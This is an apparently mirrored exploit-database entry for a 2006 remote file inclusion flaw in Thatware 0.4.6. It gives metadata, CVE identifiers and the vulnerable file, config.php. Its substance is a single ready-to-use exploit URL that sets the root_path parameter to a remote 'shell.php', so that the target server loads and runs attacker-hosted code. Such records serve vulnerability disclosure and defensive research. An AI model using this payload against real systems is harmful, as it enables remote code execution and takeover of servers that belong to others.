[] NeoSense
E X P L O I T S
title author type platform port cve id

Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion

Author: Drago84
type: webapps
platform: php
port: 80.0
date_added: 2006-08-09 
date_updated: 2016-09-01 
verified: 1 
codes: OSVDB-29481;CVE-2006-4213;CVE-2002-2298 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comthatware_0.4.6.tar.gz
Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://server/dir_thatware/config.php?root_path=http://server/shell.php'

Greatz: str0ke

# milw0rm.com [2006-08-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.